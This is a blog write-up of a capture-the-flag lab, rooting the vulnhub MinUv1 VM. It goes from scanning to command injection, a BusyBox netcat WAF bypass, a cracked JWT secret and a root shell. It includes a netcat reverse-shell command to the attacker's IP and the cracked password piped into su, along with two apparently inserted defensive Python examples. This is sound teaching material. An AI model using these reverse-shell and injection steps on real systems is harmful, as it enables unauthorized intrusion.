Sorry it’s been quite a while since my last blog post.
Lately I’ve spent a decent chunk of time rooting virtual machines from vulnhub.com. The site distributes capture the flag (CTF) style virtual machines with various levels of difficulty and vulnerabilities to find.
Recently I finished the MinUv1 challenge. After reading the description in the “flag” and various other people’s blogs on how they circumvented the system’s security, I think I have a solution slightly different to the normal method.
If you haven’t yet finished the challenge then be warned, there are spoilers ahead.
Before I start I will mention that this report contains mostly the working parts of my solution; I spent quite a bit of time investigating what were ultimately dead ends.
OK, so I downloaded the virtual machine from the website and launched it in VirtualBox. The first scan I did was a basic nmap:
The initial scan indicates that there is an HTTP server running on port 80… OK, that’s interesting, but a deeper scan is always worth doing. This time with extra flags:
nmap -A -p- -Pn -n 192.168.0.11
What do these extra options do?
- -A enables aggressive detection: OS and service version detection, default scripts and traceroute (this is noisy)
- -p- scans all 65535 TCP ports rather than nmap’s default top 1000
- -Pn skips host discovery, treats the hosts as online
- -n skips DNS resolution
This scan again shows the HTTP server on port 80 and didn’t find any other services, but it did give us the service and version (Apache/2.4.27 (Ubuntu)).
I opened the IP address in Firefox and only found the default page that apache2 serves when it is first installed on Ubuntu. The page isn’t interactive and I don’t think it’s exploitable.
Next up I scan the website with Nikto. This is usually a good starting point for web application exploitation as it tends to find important things quite quickly.
nikto -h 192.168.0.11
Interesting, Nikto didn’t find anything at all.
At this point I thought back to a previous CTF I had completed where I used a tool called dirsearch to brute-force file names in directories that have no directory index.
./dirsearch.py -u http://192.168.0.11 -e html,php,cgi,txt,cfg
A hit! I opened the test.php page in my browser to have a look.
Immediately my thoughts go to directory traversal, or perhaps being able to dump the contents of /etc/passwd.
I give various parameters a try but they all seem to be met by 403 forbidden errors.
My next thought is command injection. I assume the PHP script is calling the system command “cat” to get the contents of the file, so I try injecting a “whoami” command into the system call by separating the cat from my command with a semicolon “;”. If I am right, the PHP script would effectively be running:
This also returned forbidden. Initially I thought that the file contents might be getting retrieved some other way, but I tried a few other commands.
Success! There is a command injection and its output is returned to the browser. Interesting that the whoami command (and some others that I tried) was blocked. At this point I assume there is some sort of script/WAF blocking certain commands from being executed.
The obvious thing to do here is to try and spawn a reverse TCP shell from the server back to my attacker machine. I try a few different ways of executing netcat, “nc”, “/bin/nc”, “netcat”, “/bin/netcat” etc., but all return a 403 forbidden error.
I remembered a comment on the netsec subreddit from a week or so ago about ways of bypassing local security restrictions by executing commands from within different unrestricted binaries, the site https://gtfobins.github.io/ contains a list of these binaries.
I spent quite a bit of time trying various combinations of netcat executing from these binaries but finally found BusyBox. BusyBox is a single binary which contains miniaturised versions of common utilities. I tried calling the BusyBox version of netcat:
Which didn’t 403. And after starting a listening netcat on my attacker machine:
Great! Now we have a shell as the www-data user on the server.
Once we are on the box I spent more time than I would like to admit combing through various configuration files looking for clues.
The passwd file contained the following:
Indicating there was a user named bob. I navigated to bob’s user directory to have a look.
Interesting file name here. The file contained what I eventually found out was a JWT (JSON Web Token). A JWT carries some data signed with a secret. You can read the data without the secret; the secret is only needed to verify that the data hasn’t been tampered with. You can read more about them here: https://jwt.io/.
I downloaded a utility, JWT-Cracker, which brute-forces the secret of these tokens, and used it to crack the secret. This took some time (and I wish I had compiled one of the C-based crackers)…
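To show what the cracker is working against, here is an added example (not code from the post, JWT-Cracker or the MinUv1 VM) that builds, reads and verifies an HS256 token with the standard library only; the payload, secret and claims are constructed. It also estimates the keyspace of a secret: a 5-character alphanumeric secret like the one recovered here has under 30 bits to search, which is why an offline brute force finishes.

```python
"""Decode and verify an HS256 JWT with the Python standard library (added example)."""
import base64
import hashlib
import hmac
import json
import math


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_hs256_token(payload: dict, secret: str) -> str:
    """Build header.payload.signature the way a JWT library does."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def read_claims(token: str) -> dict:
    """The payload is only base64url-encoded, so anyone can read it without the secret."""
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC and compare in constant time; only accept HS256."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return False  # never let the token pick the algorithm (e.g. "none")
    expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def secret_search_bits(secret: str, alphabet_size: int = 62) -> float:
    """Keyspace in bits for a secret drawn from an alphabet: log2(alphabet_size ** len)."""
    return len(secret) * math.log2(alphabet_size)


if __name__ == "__main__":
    tok = make_hs256_token({"user": "bob"}, "s3cret")  # constructed claims and secret
    print(tok, read_claims(tok), verify_hs256(tok, "s3cret"))
    print(f"5-char alnum secret: {secret_search_bits('abcd1'):.1f} bits; 32 random bytes: {secret_search_bits('x' * 32, 256):.0f} bits")
```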
I make an assumption that bob, like many people, uses the same password in various places. I first want to try this password to get into bob’s account. The issue I had here was that the netcat shell is not a tty shell, so in theory you can’t run su (as it prompts for the password on the terminal rather than reading it from its input).
After quite a bit of Googling I discovered that you can fool su by running it inside script, i.e. script -c "su …", and echoing the password into it, e.g.
echo mlnV1 | script -c 'su - bob'
I should note that this is a terrible idea on machines that you administer as it can leave the password in the bash history.
I tried this from my netcat www-data user shell:
OK so bob didn’t re-use this password for his account. What about root:
Interesting… looks like the script entered a root shell before exiting.
The script command runs the command it’s given and exits as soon as that command finishes, so in order to keep the root shell running I executed the usual netcat command followed by the & symbol to start it in the background.
echo mlnV1 | script -c "su - root 'nc 192.168.0.6 4444 -e /bin/sh &'"
And after running a listening nc on my attacker machine, I was able to root the machine!
As you can see from the description in the flag text, as well as various blogs, the intended vulnerability was to use wildcards in the command injection to bypass the WAF rather than BusyBox. Interesting that there is more than one way to finish this challenge.
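The reason both routes work is that the filter is a blocklist of command names, and a blocklist can never enumerate every binary or spelling that reaches the same result. As an added example (not the VM’s real filter, whose logic is unknown, nor code from the post), the snippet below reconstructs a hypothetical blocklist that behaves as observed (nc and netcat rejected, busybox accepted) beside the fix a defender would actually ship: an allowlist of page names and no shell at all.

```python
"""Command-name blocklist versus allowlist for a 'show me this file' page (added example)."""
import os
import tempfile
from pathlib import Path

# Hypothetical reconstruction of the observed behaviour; the real filter is unknown.
BLOCKED_COMMANDS = {"nc", "netcat", "whoami", "bash", "sh"}  # constructed blocklist

# The hardened reader only knows these names; anything else is refused outright.
ALLOWED_PAGES = {"index.html", "about.html", "test.txt"}  # constructed allowlist


def blocklist_allows(shell_snippet: str) -> bool:
    """Naive WAF: reject only if some ;-separated command's basename is on the list."""
    for cmd in shell_snippet.split(";"):
        parts = cmd.strip().split()
        if parts and os.path.basename(parts[0]) in BLOCKED_COMMANDS:
            return False
    return True  # any binary not on the list (e.g. busybox) sails through


def safe_read(base_dir: Path, requested: str) -> str:
    """Hardened reader: exact-match allowlist, path confined to base_dir, no shell."""
    if requested not in ALLOWED_PAGES:
        raise ValueError(f"not an allowed page: {requested!r}")
    target = (base_dir / requested).resolve()
    if target.parent != base_dir.resolve():  # belt and braces against traversal
        raise ValueError("resolved outside base directory")
    return target.read_text()


def demo() -> dict:
    """Run both filters over the input shapes the post describes; returns the verdicts."""
    results = {
        "plain_cat": blocklist_allows("cat index.html"),
        "whoami": blocklist_allows("cat index.html; whoami"),
        "nc_path": blocklist_allows("cat index.html; /bin/nc 10.0.0.1 4444"),
        "busybox": blocklist_allows("cat index.html; busybox nc 10.0.0.1 4444"),
    }
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "index.html").write_text("<h1>It works!</h1>")  # constructed page
        results["safe_ok"] = safe_read(base, "index.html")
        for bad in ("index.html; whoami", "../etc/passwd", "busybox nc"):
            try:
                safe_read(base, bad)
                results[bad] = "ALLOWED"
            except ValueError:
                results[bad] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```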